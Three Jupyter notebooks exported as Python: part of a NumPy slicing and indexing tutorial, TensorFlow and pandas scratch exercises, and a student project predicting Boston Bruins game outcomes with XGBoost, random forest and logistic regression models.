# For example `my_array[0:5:-1]`
#
# * **Fancy Indexing**: we build a list of indices and use it to access certain elements of the array: `my_array[[3,5,7,8]]`
#
# * **Boolean Indexing**: we build a "boolean mask" (an array or list of True and False) to access certain elements: `my_array[my_array > 4]`
#
#
# <a id="section_indexing_slicing"></a>
# #### Array Slicing
#
# ##### Slicing over one dimension
#
# Slicing works like it does for Python lists: [start:stop:step].
#
# The stop index is not included, but the start index is.
#
# For example, [1:3] includes index 1 but not index 3.
#
# It works like a half-open interval [1, 3).
#
# If you need a refresher on how slicing works for lists, see https://stackoverflow.com/questions/509211/understanding-slice-notation
#
#
# 
#
#
# Let's look at some examples:
#
# We create a one-dimensional array using the
# `np.arange` method, which returns evenly spaced values within a given interval.
#
# https://docs.scipy.org/doc/numpy/reference/generated/numpy.arange.html
# + pycharm={"name": "#%%\n"}
# A one-dimensional array with the integers 0 through 9:
one_d_array = np.arange(10)
one_d_array
# + pycharm={"name": "#%%\n"}
# Start = 1: begin at the second element
# Stop: not given, so we go all the way to the end.
# Step: the stride between elements is 2.
one_d_array[1::2]
# + pycharm={"name": "#%%\n"}
# Start: not given, so we begin at the first element.
# Stop: not given, so we go all the way to the end.
# Step = -1, to reverse the order of the array
one_d_array[::-1]
# + pycharm={"name": "#%%\n"}
# Slicing in reverse order
one_d_array[7:2:-1]
# -
# ##### Slicing over arrays with more dimensions
#
# With more than one dimension, we can slice along each of them, separating the slices with a comma.
#
# Let's look at some examples:
# + pycharm={"name": "#%%\n"}
random_generator_seed = np.random.default_rng(seed_cualquier_numero)
low = 0  # the lower bound is included
high = 10  # the upper bound is not included
size = (3, 4)
two_d_array = random_generator_seed.uniform(low, high, size)
two_d_array
# + pycharm={"name": "#%%\n"}
# The colon ( : ) means we take every element of each row,
# and the zero after the comma means we only do so for column 0 (the first one).
two_d_array[:, 0]
# + pycharm={"name": "#%%\n"}
# Access the third row
two_d_array[2, :]
# + pycharm={"name": "#%%\n"}
# Another way to access the third row
two_d_array[2]
# + pycharm={"name": "#%%\n"}
# All rows, a slice of the second and third columns (indices 1 and 2)
two_d_array[:, 1:3]
# + pycharm={"name": "#%%\n"}
# all rows, all columns listed in reverse order
two_d_array[:, ::-1]
# -
#
# <a id="section_indexing_fancy"></a>
# #### Fancy Indexing
# [back to TOC](#section_toc)
#
# This technique consists of building lists that contain the indices of the elements we want to select, and using those lists for indexing.
#
# Let's look at some examples:
# + pycharm={"name": "#%%\n"}
# keep all columns, and rows 1, 3, 2 plus row 1 again (indices 0, 2, 1, 0)
lista_indices_filas = [0, 2, 1, 0]
two_d_array[lista_indices_filas]
# + pycharm={"name": "#%%\n"}
# keep all rows, and columns 3, 4, 2 plus column 3 again (indices 2, 3, 1, 2)
lista_indices_columnas = [2, 3, 1, 2]
two_d_array[:, lista_indices_columnas]
# + pycharm={"name": "#%%\n"}
# now select both rows and columns, combining the two previous cases
two_d_array[lista_indices_filas, lista_indices_columnas]
# -
# Note that by passing both lists we are selecting the elements
# (0, 2), (2, 3), (1, 1) and (0, 2)
#
# It holds that `indice_elem_i = (lista_indices_filas[i], lista_indices_columnas[i])`
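The correspondence can be verified element by element. A sketch using a small known matrix (not the notebook's random two_d_array):

```python
import numpy as np

two_d = np.arange(12).reshape(3, 4)  # rows 0..2, columns 0..3
rows = [0, 2, 1, 0]
cols = [2, 3, 1, 2]

picked = two_d[rows, cols]
# each picked element comes from the (rows[i], cols[i]) position
expected = np.array([two_d[r, c] for r, c in zip(rows, cols)])
print(picked)  # [ 2 11  5  2]
assert (picked == expected).all()
```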
# <a id="section_indexing_boolean"></a>
# #### Boolean Indexing
#
# This technique is based on building a "boolean mask": a list of True and False values used to select only the elements whose index matches a True value.
#
# Let's look at some examples on two_d_array:
# + pycharm={"name": "#%%\n"}
two_d_array
# -
# Let's select the elements that are greater than 5. To do that we create a mask with that condition:
# + pycharm={"name": "#%%\n"}
mask_great_5 = two_d_array > 5
mask_great_5
# -
# The mask is True at the elements of two_d_array whose value is greater than 5, and False at those whose value is less than or equal to 5.
#
# Now let's use that mask to select the elements that satisfy the condition, i.e. those where the mask is True:
# + pycharm={"name": "#%%\n"}
two_d_array[mask_great_5]
# -
# Let's now define a more complex condition: we select the elements that are greater than 5 and less than 8
# + pycharm={"name": "#%%\n"}
mask_great_5_less_8 = (two_d_array > 5) & (two_d_array < 8)
mask_great_5_less_8
# -
# Now let's use that mask to select the elements that satisfy the condition, i.e. those where the mask is True:
# + pycharm={"name": "#%%\n"}
two_d_array[mask_great_5_less_8]
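Masks can also be combined with OR (`|`) and negated with `~`. A small sketch on a known array (not the notebook's random data):

```python
import numpy as np

vals = np.array([1, 4, 6, 7, 9])

# OR (|) combines masks: elements outside the open interval (5, 8)
outside = vals[(vals <= 5) | (vals >= 8)]
print(outside)  # [1 4 9]

# ~ negates a mask: the complement, i.e. elements strictly between 5 and 8
inside = vals[~((vals <= 5) | (vals >= 8))]
print(inside)  # [6 7]
```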
|
Code/3-numpy/1_numpy.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
# +
from __future__ import print_function
from IPython import display
import tensorflow as tf
import numpy as np
from tensorflow.python.data import Dataset
import pandas as pd
try:
tf.contrib.eager.enable_eager_execution()
print("TF imported with eager execution!")
except ValueError:
print("TF already imported with eager execution!")
# -
# # Tensor operation functions
# Define a constant
a = tf.constant([1, 2, 3], dtype=tf.int32)
print(a)
# tf.Tensor([1 2 3], shape=(3,), dtype=int32)
# Create a tensor of the given shape, filled with ones
print(tf.ones([6]))
print(tf.ones([3, 2]))
# Create a tensor of the given shape, filled with zeros
print(tf.zeros([6]))
print(tf.zeros([3, 2]))
# Reshape the data
a = tf.constant([1, 2, 3, 4, 5, 6, 7, 8, 9])
print(a)
print(tf.reshape(a, [3, 3]))
# Random numbers - normal distribution
print(tf.random_normal(shape=[10], mean=2.0, stddev=1.0))
# Random numbers - uniform within a range
print(tf.random_uniform(shape=[5, 5], minval=50, maxval=100))
# Concatenate the tensors column-wise into a multi-dimensional result
d1 = tf.random_uniform([10, 1], 0, 10)
d2 = tf.random_uniform([10, 1], 0, 10)
d3 = tf.add(d1,d2)
result = tf.concat([d1,d2,d3], axis=1)
print("d1:", d1)
print("d2:", d2)
print("d3:", d3)
print("result:", result)
datas = pd.DataFrame()
s1 = pd.Series([x for x in np.arange(100)])
datas["index"] = s1
print(datas)
a1 = [x for x in np.arange(10)]
print(a1)
a2 = np.random.permutation(a1)
print(a2)
np.random.shuffle(a1)
print(a1)
a1 = [x for x in np.arange(10)]
a1 = np.reshape(a1, [5, 2])
print(a1)
a2 = np.random.permutation(a1)
print(a2)
np.random.shuffle(a1)
print(a1)
print(np.random.permutation(np.arange(10)))
print(np.random.shuffle(np.arange(10)))
a1 = np.random.permutation(np.arange(100))
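Note the difference demonstrated above: `np.random.permutation` returns a new shuffled array, while `np.random.shuffle` shuffles in place and returns None (which is why the second print shows None). A minimal check:

```python
import numpy as np

arr = np.arange(10)
permuted = np.random.permutation(arr)   # new array; arr is untouched
shuffled_ret = np.random.shuffle(arr)   # in-place; returns None

# the permutation contains the same values, just reordered
assert sorted(permuted.tolist()) == list(range(10))
assert shuffled_ret is None
print(permuted, shuffled_ret)
```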
r1 = zip(range(1, 10), range(2, 11))
print(r1)
for rr in r1:
# rr is tuple
print(type(rr))
print("%d to %d" % rr)
print("r0 = %d, r1 = %d" % (rr[0], rr[1]))
# pd.Series.quantile sample
s1 = pd.Series(np.arange(100))
s1 = s1.append(pd.Series(np.arange(50)))
# print(s1)
r1 = s1.quantile([x for x in np.arange(0.1, 1.1, 0.1)])
print(r1)
print([r1[q] for q in r1.keys()])
|
Notes/TFOperation.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] id="view-in-github" colab_type="text"
# <a href="https://colab.research.google.com/github/npgeorge/NHL_Project/blob/master/NHL_Data_Project_Team_Stats.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# + [markdown] id="O1Qb9fmLGeWv" colab_type="text"
# #NHL Data Project
#
# + [markdown] id="RH-SQ-cfj9BI" colab_type="text"
# #Answers
#
# Choose your target. Which column in your tabular dataset will you predict?
#
# I will predict on the "won" column for the Boston Bruins first, and apply that model to all teams.
#
# Is your problem regression or classification?
#
# Classification: win or loss is a binary outcome, so the models below are classifiers.
#
# How is your target distributed?
#
# Regression: Is the target right-skewed? If so, you may want to log transform the target. TBD.
#
#
# Choose which observations you will use to train, validate, and test your model.
#
# - Are some observations outliers? Will you exclude them? TBD
# - Will you do a random split or a time-based split? Random.
#
#
# Choose your evaluation metric(s).
# - Classification: Is your majority class frequency > 50% and < 70% ? If so, you can just use accuracy if you want. Outside that range, accuracy could be misleading. What evaluation metric will you choose, in addition to or instead of accuracy?
# - Begin to clean and explore your data.
# - Begin to choose which features, if any, to exclude. Would some features "leak" future information?
# + id="dkNB583mYbhg" colab_type="code" colab={}
# %%capture
import sys
if 'google.colab' in sys.modules:
# Install packages in Colab
# !pip install category_encoders==2.*
# !pip install eli5
# !pip install pandas-profiling==2.*
# !pip install pdpbox
# !pip install shap
# !pip install plotly_express
#imports
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
import seaborn as sns
import plotly_express as px
import sklearn
# + id="1aM2n7XVR3fO" colab_type="code" outputId="9bd2fbb5-9ca6-48dc-e981-a534fb4ce02e" colab={"base_uri": "https://localhost:8080/", "height": 125}
from google.colab import drive
drive.mount('/content/gdrive')
# + id="QfwA3lOVSXpJ" colab_type="code" colab={}
file_path = '/content/gdrive/My Drive/Lambda School/NHL Project/game_teams_stats.csv'
# + id="W7w9FrznSe2s" colab_type="code" colab={}
df = pd.read_csv(file_path)
# + id="B2wVEHUGlQCh" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="4f2c3419-ae3b-4321-d445-893fa52bf06d"
df.shape
# + id="amTHVpwU2w72" colab_type="code" outputId="e729f266-b0e8-4333-a594-660b669fe474" colab={"base_uri": "https://localhost:8080/", "height": 97}
df.head(1)
# + id="IpUmmBBmv2C7" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 267} outputId="a6f1d70f-cbaa-4bb4-fc96-ee3a7a9c0d0f"
df.tail()
# + id="iznqI9heeClY" colab_type="code" outputId="b7be254a-131b-44a3-d0b8-866520d9df4f" colab={"base_uri": "https://localhost:8080/", "height": 301}
df.dtypes
# + [markdown] id="JEgLsg6jV84s" colab_type="text"
#
# Game IDs
# The first 4 digits identify the season of the game (ie. 2017 for the 2017-2018 season).
# The next 2 digits give the type of game, where 01 = preseason, 02 = regular season,
# 03 = playoffs, 04 = all-star.
# The final 4 digits identify the specific game number.
# For regular season and preseason games, this ranges from 0001 to the
# number of games played. (1271 for seasons with 31 teams (2017 and onwards)
# and 1230 for seasons with 30 teams).
# For playoff games, the 2nd digit of the specific number gives the round of the playoffs,
# the 3rd digit specifies the matchup, and the 4th digit specifies the game (out of 7).
#
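The game-ID scheme described above can be sketched as a small parser (illustrative only; the function and field names are my own, not from the original notebook):

```python
def parse_game_id(game_id):
    """Split an NHL game_id into season, game type, and game number.

    Digit layout: SSSSTTNNNN - season (4 digits), type (2 digits:
    01 preseason, 02 regular season, 03 playoffs, 04 all-star),
    and the specific game number (4 digits).
    """
    s = str(game_id)
    return {
        'season': int(s[:4]),
        'game_type': int(s[4:6]),
        'game_number': int(s[6:]),
    }

print(parse_game_id(2017020001))
# {'season': 2017, 'game_type': 2, 'game_number': 1}
```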
# + id="EQJ9hW6OZYMK" colab_type="code" colab={}
#wrangle function to separate the game_id column into season, game_type, and game_number
def wrangle(X):
#breaking out game_id
X['season'] = X.game_id.astype(str).str[:4].astype(int)
#regular season and playoffs
X['game_type'] = X.game_id.astype(str).str[4:6].astype(int)
#to allow ordering of games
X['game_number'] = X.game_id.astype(str).str[6:].astype(int)
# return the wrangled dataframe
return X
df = wrangle(df)
# + id="G9KFJNlYZdwN" colab_type="code" outputId="bee33641-a3fa-408a-8b45-4534c0d4eb11" colab={"base_uri": "https://localhost:8080/", "height": 526}
#sorting by game_id test
df.sort_values('game_id')
# + id="1ajlyyVGos1z" colab_type="code" outputId="512ab505-c8c1-43cd-80bc-0db047353ae2" colab={"base_uri": "https://localhost:8080/", "height": 176}
#seasons conditional
season_2010to2011 = (df['season'] == 2010)
season_2011to2012 = (df['season'] == 2011)
season_2012to2013 = (df['season'] == 2012)
season_2013to2014 = (df['season'] == 2013)
season_2014to2015 = (df['season'] == 2014)
season_2015to2016 = (df['season'] == 2015)
season_2016to2017 = (df['season'] == 2016)
season_2017to2018 = (df['season'] == 2017)
season_2018to2019 = (df['season'] == 2018)
#passing in each condition
df_10_11 = df[season_2010to2011]
df_11_12 = df[season_2011to2012]
df_12_13 = df[season_2012to2013]
df_13_14 = df[season_2013to2014]
df_14_15 = df[season_2014to2015]
df_15_16 = df[season_2015to2016]
df_16_17 = df[season_2016to2017]
df_17_18 = df[season_2017to2018]
df_18_19 = df[season_2018to2019]
#seasons can vary depending on playoff games
#the 2012-2013 season has far less data because it was shortened to 48 regular-season games by the NHL lockout
print('2010-2011 Season games, data collected: ', df_10_11.shape)
print('2011-2012 Season games, data collected: ', df_11_12.shape)
print('2012-2013 Season games, data collected: ', df_12_13.shape)
print('2013-2014 Season games, data collected: ', df_13_14.shape)
print('2014-2015 Season games, data collected: ', df_14_15.shape)
print('2015-2016 Season games, data collected: ', df_15_16.shape)
print('2016-2017 Season games, data collected: ', df_16_17.shape)
print('2017-2018 Season games, data collected: ', df_17_18.shape)
print('2018-2019 Season games, data collected: ', df_18_19.shape)
# + id="srNf4FgQ1vmy" colab_type="code" colab={}
#checking out 2012 data, may just drop it or skip it
#df.loc[(df['game_id'] >= 2012020000) & (df['game_id'] <= 2012031300)]
# + id="QkysjyZ6x1Dx" colab_type="code" colab={}
#checking through 2012 season
#df.loc[df['game_id'] >= 2012020570 & df['game_id'] <= 2012021271]
#reg_season = ((df['game_id'] >= 2012020000) & (df['game_id'] <= 2012021300))
#playoffs = ((df['game_id'] >= 2012030000) & (df['game_id'] <= 2012031300))
#a_range = df[a]['game_id'].max() - df[a]['game_id'].min()
#b_range = df[b]['game_id'].max() - df[b]['game_id'].min()
#print(a_range)
#print(b_range)
# + id="T2UF-9RINr-C" colab_type="code" outputId="6ee94a0f-214c-4959-def0-0c5c2c38088f" colab={"base_uri": "https://localhost:8080/", "height": 34}
#bruins
#if a model works for one team, it *could* work broadly for others
#this may turn out to be a bad assumption
#this filter returns the df for the Bruins
#or statement for home and away games
bruins_id_condition = df['team_id'] == 6
df_bruins = df[bruins_id_condition]
df_bruins.shape
# + id="zVYqec434R55" colab_type="code" outputId="0a5b8772-424a-4e35-f462-c543d2bb1ee6" colab={"base_uri": "https://localhost:8080/", "height": 34}
#bruins 13 to 14 season
bruins_id_condition_13_14 = df_13_14['team_id'] == 6
df_bruins_13_14 = df_13_14[bruins_id_condition_13_14]
df_bruins_13_14.shape
# + id="oxo4IWS4pNYF" colab_type="code" colab={}
#sort the season to be in order of the games played
#want to have a streak feature... wins in a row, losses in a row
#df_bruins_13_14 = df_bruins_13_14.sort_values(by=['game_number'])
# + id="E-lLjS3eOmAE" colab_type="code" colab={}
#different plots for visualizations
#px.scatter(df_bruins_13_14, x='shots', y='goals', marginal_x='box', marginal_y='violin', trendline='ols')
#px.scatter(df_bruins_13_14, x='hits', y='goals', marginal_x='box', marginal_y='violin')
#px.scatter(df_bruins_13_14, x='giveaways', y='goals', marginal_x='box', marginal_y='violin')
# + id="j6KgJEhHObeR" colab_type="code" outputId="ad4fdb8b-e5cd-4640-8229-112ff328f7fa" colab={"base_uri": "https://localhost:8080/", "height": 70}
#baseline, can we beat the Bruins baseline target?
baseline_target = 'won'
y_baseline = df_bruins[baseline_target]
y_baseline.value_counts(normalize=True)
# + id="f7mqqtEs58eZ" colab_type="code" outputId="86872743-c63a-42cb-e475-18da763c51d4" colab={"base_uri": "https://localhost:8080/", "height": 34}
import pandas as pd
from sklearn.model_selection import train_test_split
#train, test
train, test = train_test_split(df_bruins,
train_size=0.80,
test_size=0.20,
stratify=df_bruins['won'],
random_state=42)
train.shape, test.shape
# + id="6eIV3h1d6cKl" colab_type="code" outputId="0b2b17c5-7784-4516-eb40-bf432bbb05de" colab={"base_uri": "https://localhost:8080/", "height": 34}
#train, val
train, val = train_test_split(train,
train_size=0.80,
test_size=0.20,
stratify=train['won'],
random_state=42)
train.shape, val.shape
# + id="IogUVnDdV1pc" colab_type="code" outputId="924fa8f5-5445-434b-db33-7df4d8371be9" colab={"base_uri": "https://localhost:8080/", "height": 217}
train.head()
# + id="8sy-nH176l18" colab_type="code" colab={}
#target and features
target = 'won'
#drop target
train_features = train.drop(columns=[target,'team_id', 'game_id', 'powerPlayGoals', 'game_number', 'settled_in', 'head_coach', 'season'])
#numeric features
num_feat = train_features.select_dtypes(include='number').columns.tolist()
#series with cardinality of non-numeric features
cardinality = train_features.select_dtypes(exclude='number').nunique()
#list with cardinality less than 10
cat_feat = cardinality[cardinality <= 10].index.tolist()
# Combine the lists
features = num_feat + cat_feat
# + id="sjL2g46464iL" colab_type="code" colab={}
# Arrange data into X features matrix and y target vector
X_train = train[features]
y_train = train[target]
X_val = val[features]
y_val = val[target]
X_test = test[features]
y_test = test[target]
# + id="t3yXgMIfVN7f" colab_type="code" outputId="39923d35-76eb-4a2c-ba28-eca1e6d15e2f" colab={"base_uri": "https://localhost:8080/", "height": 34}
X_train.shape
# + id="xrljHjNO-hLi" colab_type="code" outputId="6acbf8e5-a960-4028-e86b-8a4760692a40" colab={"base_uri": "https://localhost:8080/", "height": 70}
#with XG Boost
import category_encoders as ce
import xgboost
from xgboost import XGBClassifier
import sklearn
from sklearn.pipeline import make_pipeline
from sklearn.metrics import accuracy_score
import joblib
from joblib import dump
pipeline_xgb = make_pipeline(
ce.OrdinalEncoder(),
XGBClassifier(n_estimators=15, random_state=42, n_jobs=-1)
)
# Fit on train, score on val
pipeline_xgb.fit(X_train, y_train)
print('Training Accuracy', pipeline_xgb.score(X_train, y_train))
print('Validation Accuracy:', pipeline_xgb.score(X_val, y_val))
#predict on test
y_pred_xgb = pipeline_xgb.predict(X_test)
#Test Accuracy score
print('Test Accuracy for XG Boost', accuracy_score(y_test, y_pred_xgb))
# + id="renVCV3egDx5" colab_type="code" outputId="64b0b9e8-a07d-4a28-c922-78165e2a6cbc" colab={"base_uri": "https://localhost:8080/", "height": 87}
#printing versions to download locally
print(f'joblib=={joblib.__version__}')
print(f'category_encoders=={ce.__version__}')
print(f'scikit-learn=={sklearn.__version__}')
print(f'xgboost=={xgboost.__version__}')
# + id="95bR3vgm-6Df" colab_type="code" outputId="a4fa39e3-f553-4f86-b1d6-55b020a0bf6e" colab={"base_uri": "https://localhost:8080/", "height": 374}
#feature importance for X val
import matplotlib.pyplot as plt
model = pipeline_xgb.named_steps['xgbclassifier']
encoder = pipeline_xgb.named_steps['ordinalencoder']
encoded_columns = encoder.transform(X_val).columns
importances = pd.Series(model.feature_importances_, encoded_columns)
plt.figure(figsize=(3,6))
importances.sort_values().plot.barh(color='black');
# + id="yfdmHzBz0LXY" colab_type="code" outputId="7e135dce-a8da-4a52-f5c5-7925e267ea02" colab={"base_uri": "https://localhost:8080/", "height": 70}
#random forest classifier pipeline
import category_encoders as ce
from sklearn.impute import SimpleImputer
from sklearn.ensemble import RandomForestClassifier
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.metrics import accuracy_score
pipeline = make_pipeline(
ce.OneHotEncoder(use_cat_names=True),
SimpleImputer(),
StandardScaler(),
RandomForestClassifier(n_estimators=100,
n_jobs=-1,
min_samples_leaf=1,
max_depth=10,
class_weight='balanced',
max_features=7,
)
)
# Fit on train
pipeline.fit(X_train, y_train)
# Predict on Test Data
y_pred_rfc = pipeline.predict(X_test)
# Score on Train/Val
print('Training Accuracy', pipeline.score(X_train, y_train))
print('Validation Accuracy', pipeline.score(X_val, y_val))
print('Test Accuracy for Random Forest', accuracy_score(y_test, y_pred_rfc))
# + id="mcvsiLY71_4x" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 70} outputId="a7b026d0-cb86-4653-852e-31269b12c150"
#Linear model that beats baseline
#logistic regression
from sklearn.linear_model import LogisticRegression
pipeline_lin = make_pipeline(
ce.OneHotEncoder(use_cat_names=True),
SimpleImputer(),
StandardScaler(),
#Ridge(alpha=1.0)
LogisticRegression(solver='lbfgs')
)
# Fit on train
pipeline_lin.fit(X_train, y_train)
#score on train
pipeline_lin.score(X_train, y_train)
# Predict on Test Data
y_pred_lin = pipeline_lin.predict(X_test)
# Score on Train/Val
print('Training Accuracy', pipeline_lin.score(X_train, y_train))
print('Validation Accuracy', pipeline_lin.score(X_val, y_val))
print('Test Accuracy', pipeline_lin.score(X_test, y_test))
# + id="zb_ZYET40fET" colab_type="code" outputId="4559e14c-710a-4878-bc1e-82fcad17259f" colab={"base_uri": "https://localhost:8080/", "height": 141}
#setting up ELI5 for XGBOOST
pipeline_pi = make_pipeline(
ce.OrdinalEncoder(),
SimpleImputer(strategy='median')
)
X_train_transformed = pipeline_pi.fit_transform(X_train)
X_val_transformed = pipeline_pi.transform(X_val)
model_pi = XGBClassifier(n_estimators=15, random_state=42, n_jobs=-1)
model_pi.fit(X_train_transformed, y_train)
# + id="EIGxVuCj1B_J" colab_type="code" outputId="65b9bbac-c631-4272-8f11-dc37262b70f8" colab={"base_uri": "https://localhost:8080/", "height": 545}
import eli5
from eli5.sklearn import PermutationImportance
permuter = PermutationImportance(
model_pi,
scoring='accuracy',
n_iter=5,
random_state=42
)
permuter.fit(X_val_transformed, y_val)
# + id="DTgjjsI51V3D" colab_type="code" outputId="b03b4d41-d5fe-40b2-8354-89e25d569846" colab={"base_uri": "https://localhost:8080/", "height": 52}
permuter.feature_importances_
# + id="jf0vO_yW1Zut" colab_type="code" outputId="f4e15c43-7148-4e60-948a-eb47b1cae24d" colab={"base_uri": "https://localhost:8080/", "height": 200}
eli5.show_weights(
permuter,
top=None,
feature_names=X_val.columns.tolist()
)
# + id="M--QNzKBTcjE" colab_type="code" colab={}
import matplotlib.pyplot as plt
plt.rcParams['figure.dpi'] = 72
# + id="_fIvsP7yT6VF" colab_type="code" colab={}
from pdpbox.pdp import pdp_isolate, pdp_plot
# + id="ktTd76zUUBfI" colab_type="code" outputId="8ba7cd34-a189-4c9f-f5ef-28fe463d6425" colab={"base_uri": "https://localhost:8080/", "height": 648}
feature='faceOffWinPercentage'
pdp_faceoffs = pdp_isolate(
model = pipeline_xgb,
dataset = X_val,
model_features = X_val.columns,
feature = feature
)
pdp_plot(pdp_faceoffs, feature_name=feature, plot_lines=True, frac_to_plot=100);
# + id="Al9ZMa8GVHU6" colab_type="code" outputId="030cd2c9-1a57-4053-8276-d88c4ae7b4e4" colab={"base_uri": "https://localhost:8080/", "height": 577}
feature='shots'
pdp_shots = pdp_isolate(
model = pipeline_xgb,
dataset = X_val,
model_features = X_val.columns,
feature = feature
)
pdp_plot(pdp_shots, feature_name=feature, plot_lines=True, frac_to_plot=100);
# + id="0o-_dq01EcqX" colab_type="code" outputId="c5cab31d-c9c1-4b08-99dd-5b679510c9e6" colab={"base_uri": "https://localhost:8080/", "height": 598}
#PDP two features
from pdpbox.pdp import pdp_interact, pdp_interact_plot
features=['hits','shots']
interaction = pdp_interact(
model=pipeline_xgb,
dataset=X_val,
model_features=X_val.columns,
features=features
)
pdp_interact_plot(interaction, plot_type='grid', feature_names=features);
# + [markdown] id="7tyL961uVQ3j" colab_type="text"
# #ROC/AUC Score
# + id="1oC4wXczDnTL" colab_type="code" outputId="78897994-6b33-48ca-d275-b753d7c77e42" colab={"base_uri": "https://localhost:8080/", "height": 710}
#for ROC/AUC from class..
processor = make_pipeline(
ce.OrdinalEncoder(),
SimpleImputer(strategy='median')
)
X_train_processed = processor.fit_transform(X_train)
X_val_processed = processor.transform(X_val)
eval_set = [(X_train_processed, y_train),
(X_val_processed, y_val)]
model = XGBClassifier(n_estimators=1000, n_jobs=-1)
model.fit(X_train_processed, y_train, eval_set=eval_set, eval_metric='auc',
early_stopping_rounds=10)
# + id="ygL6o89eDwNC" colab_type="code" outputId="63a36988-96c8-4ef0-eeeb-a5d002297aaf" colab={"base_uri": "https://localhost:8080/", "height": 52}
from sklearn.metrics import roc_auc_score
X_test_proc = processor.transform(X_test)
class_index = 1
y_pred_proba = model.predict_proba(X_test_proc)[:, class_index]
print(f'Test ROC AUC for class {class_index}:')
print(roc_auc_score(y_test, y_pred_proba))
# + id="i-rCgr3sD1u4" colab_type="code" outputId="6d9dfa3e-dcca-49db-9818-8976871a8d5d" colab={"base_uri": "https://localhost:8080/", "height": 1000}
#ROC/AUC
from sklearn.metrics import roc_curve
# Probability for last class
y_pred_proba = pipeline_xgb.predict_proba(X_val)[:, -1]
fpr, tpr, thresholds = roc_curve(y_val, y_pred_proba)
#data frame
pd.DataFrame({
'False Positive Rate': fpr,
'True Positive Rate': tpr,
'Threshold': thresholds
})
# + id="hwEUGmZOD6DT" colab_type="code" outputId="52626d0a-5d22-4123-fde7-fced363ecc51" colab={"base_uri": "https://localhost:8080/", "height": 294}
plt.plot(fpr, tpr)
plt.title('ROC curve (goals included)')
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate');
# + id="uMp5oUnd83VK" colab_type="code" outputId="c0147876-5ee5-4e46-93f1-c238739a53fe" colab={"base_uri": "https://localhost:8080/", "height": 212}
#shap #1
import shap
row = X_test.iloc[[60]]
explainer=shap.TreeExplainer(model)
row_processed = processor.transform(row)
shap_values = explainer.shap_values(row_processed)
shap.initjs()
shap.force_plot(
base_value=explainer.expected_value,
shap_values=shap_values,
features=row,
link='logit'
)
# + id="fVVRc28Kwetr" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 70} outputId="67f9e00a-314a-474c-d92e-9b40c0b85504"
#confusion matrix
from sklearn.metrics import confusion_matrix
from sklearn.utils.multiclass import unique_labels
print(confusion_matrix(y_test, y_pred_xgb))
print(unique_labels(y_test))
# + id="vqOFI9vewL_5" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 264} outputId="ac501ad6-4efd-415f-859c-5ce8779ca301"
import seaborn as sns
def plot_confusion_matrix(y_true, y_pred):
labels = unique_labels(y_true)
columns = [f'Predicted {label}' for label in labels]
index = [f'Actual {label}' for label in labels]
df = pd.DataFrame(confusion_matrix(y_true, y_pred),
columns = columns,
index = index)
return sns.heatmap(df, annot=True, fmt='d', cmap='Blues')
plot_confusion_matrix(y_test, y_pred_xgb);
# + [markdown] id="xMH3_BNiP96u" colab_type="text"
# #Dash App Interface
# + id="PDnV7dGw_IHj" colab_type="code" outputId="9dc16553-2a36-448a-8882-8ca4ff7cd94c" colab={"base_uri": "https://localhost:8080/", "height": 33}
import joblib
from joblib import dump
dump(pipeline_xgb, 'pipeline_xgb.joblib', compress=True)
# + id="udLLqhzgbkLw" colab_type="code" colab={}
from google.colab import files
files.download('pipeline_xgb.joblib')
# + id="0eDe-TtdixBX" colab_type="code" outputId="a768ce4e-f721-47a4-b356-8af23a76cada" colab={"base_uri": "https://localhost:8080/", "height": 197}
X_train.head()
# + id="8pBKs7IaiYk4" colab_type="code" colab={}
def predict(goals, shots, hits, pim, powerPlayOpportunities, faceOffWinPercentage, giveaways, takeaways, game_type, HoA):
df_dash = pd.DataFrame(
columns=['goals', 'shots', 'hits', 'pim', 'powerPlayOpportunities', 'faceOffWinPercentage','giveaways', 'takeaways','game_type','HoA'],
data=[[goals, shots, hits, pim, powerPlayOpportunities, faceOffWinPercentage, giveaways, takeaways, game_type, HoA]]
)
y_pred = pipeline_xgb.predict_proba(df_dash)[:,1]
return f'{y_pred}'
# + id="tJLJ2UV6j77O" colab_type="code" outputId="1c5958c5-17bf-48b7-ec85-89b0f724c131" colab={"base_uri": "https://localhost:8080/", "height": 34}
predict(4, 21, 29, 4, 1, 52.7, 8, 8, 2, 'away')
# + id="FN3VPNBiYgew" colab_type="code" outputId="9c931be2-8a8e-4256-e1c8-e2e128e0013e" colab={"base_uri": "https://localhost:8080/", "height": 217}
df_10_11 = df_10_11[bruins_id_condition]
df_10_11 = df_10_11.sort_values(by=['game_number'])
df_10_11.tail()
# + [markdown] id="CqUTZQGHwFjM" colab_type="text"
# # Stanley Cup Case Study
# + id="CZgogNTYbONh" colab_type="code" outputId="57ad550f-85de-494a-f835-49409c62a4a6" colab={"base_uri": "https://localhost:8080/", "height": 817}
#predicting on 2010-2011 stanley cup playoffs last game
#pass in conditionals
condition = ((df['game_type'] == 3) & (df['season'] == 2010) & (df['head_coach'] == '<NAME>'))
df_stanley_cup = df[condition]
#sort by game number to ensure order is correct
df_stanley_cup = df_stanley_cup.sort_values('game_number')
df_stanley_cup
# + id="j23yYixygRe6" colab_type="code" outputId="5c2e1461-c3a6-4b11-e420-f01a7088b2f8" colab={"base_uri": "https://localhost:8080/", "height": 787}
#dropping last game to summarize the numerical data and run through prediction
df_stanley_cup = df_stanley_cup.drop([304])
df_stanley_cup
# + id="LJUwWcauV-sj" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 301} outputId="a4e05563-df75-451a-b1d7-6ad50059951c"
df_stanley_cup.mean()
# + id="pSkkrAtjg2Kg" colab_type="code" outputId="c85039f6-e768-44e9-9a66-0dc153b55094" colab={"base_uri": "https://localhost:8080/", "height": 34}
# The model predicted with 54% probability that the Bruins would win
